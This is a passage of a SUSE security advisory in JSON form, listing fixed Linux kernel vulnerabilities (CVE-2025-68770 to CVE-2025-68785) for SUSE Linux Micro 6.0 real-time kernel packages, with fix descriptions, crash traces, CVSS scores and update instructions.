"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68778",
"url": "https://www.suse.com/security/cve/CVE-2025-68778"
},
{
"category": "external",
"summary": "SUSE Bug 1256683 for CVE-2025-68778",
"url": "https://bugzilla.suse.com/1256683"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68785",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68785"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: fix middle attribute validation in push_nsh() action\n\nThe push_nsh() action structure looks like this:\n\n OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...))\n\nThe outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK\u0027ed by the\nnla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost\nOVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK\u0027ed by the nla_for_each_nested()\ninside nsh_key_put_from_nlattr(). But nothing checks if the attribute\nin the middle is OK. We don\u0027t even check that this attribute is the\nOVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data()\ncalls - first time directly while calling validate_push_nsh() and the\nsecond time as part of the nla_for_each_nested() macro, which isn\u0027t\nsafe, potentially causing invalid memory access if the size of this\nattribute is incorrect. The failure may not be noticed during\nvalidation due to larger netlink buffer, but cause trouble later during\naction execution where the buffer is allocated exactly to the size:\n\n BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n Read of size 184 at addr ffff88816459a634 by task a.out/22624\n\n CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary)\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x70\n print_address_description.constprop.0+0x2c/0x390\n kasan_report+0xdd/0x110\n kasan_check_range+0x35/0x1b0\n __asan_memcpy+0x20/0x60\n nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n push_nsh+0x82/0x120 [openvswitch]\n do_execute_actions+0x1405/0x2840 [openvswitch]\n ovs_execute_actions+0xd5/0x3b0 [openvswitch]\n ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch]\n genl_family_rcv_msg_doit+0x1d6/0x2b0\n genl_family_rcv_msg+0x336/0x580\n genl_rcv_msg+0x9f/0x130\n netlink_rcv_skb+0x11f/0x370\n genl_rcv+0x24/0x40\n netlink_unicast+0x73e/0xaa0\n netlink_sendmsg+0x744/0xbf0\n __sys_sendto+0x3d6/0x450\n do_syscall_64+0x79/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\nLet\u0027s add some checks that the attribute is properly sized and it\u0027s\nthe only one attribute inside the action. Technically, there is no\nreal reason for OVS_KEY_ATTR_NSH to be there, as we know that we\u0027re\npushing an NSH header already, it just creates extra nesting, but\nthat\u0027s how uAPI works today. So, keeping as it is.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
